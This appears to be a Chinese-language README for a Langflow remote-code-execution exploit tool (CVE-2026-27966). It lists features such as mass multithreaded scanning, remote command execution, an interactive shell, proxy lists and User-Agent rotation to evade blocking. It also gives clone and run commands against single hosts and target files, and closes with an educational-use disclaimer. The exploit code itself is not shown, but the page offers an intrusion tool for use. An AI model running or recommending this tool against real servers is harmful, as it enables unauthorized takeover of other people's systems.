| 功能 | 描述 |
|---|
| 多线程扫描器 | 使用可配置线程(默认 20)扫描数千个目标 |
| 智能检测 | 通过多个端点检查检测 Langflow |
| 自动创建 Flow | 如果没有 Flow ID 则自动创建 Flow |
| 命令执行 | 执行远程系统命令 |
| 交互式 Shell | 带彩色输出的完整交互式 Shell |
| 代理支持 | HTTP/HTTPS 代理 + 从文件加载代理列表 |
| User-Agent 轮换 | 20+ 个 User-Agent 以规避封锁 |
| 输出清理 | 清理 JSON 包装器中的输出 |
| 调试模式 | 详细日志记录用于故障排查 |
| 保存结果 | 将易受攻击的目标保存到文件 |
git clone https://github.com/alvinhidayatullah/cve-2026-27966-langflow-rce.git
cd cve-2026-27966-langflow-rce
python3 langflow.py -t http://target.com:7860
python3 langflow.py -f targets.txt
python3 langflow.py -t http://target.com:7860 -i
python3 langflow.py -f targets.txt -i
http://192.168.1.100:7860
https://langflow.company.com
http://10.10.10.50:7860
192.168.1.200:7860
⚠️ 重要提示:该工具仅用于教育目的和经系统所有者书面授权的安全审计。未经授权的使用是违法的,并可能受到刑事处罚。
作者不对滥用该工具的行为负责。请明智且负责任地使用!
如果该工具有用,别忘了在 GitHub 上 ⭐!
祝道德黑客愉快!🚀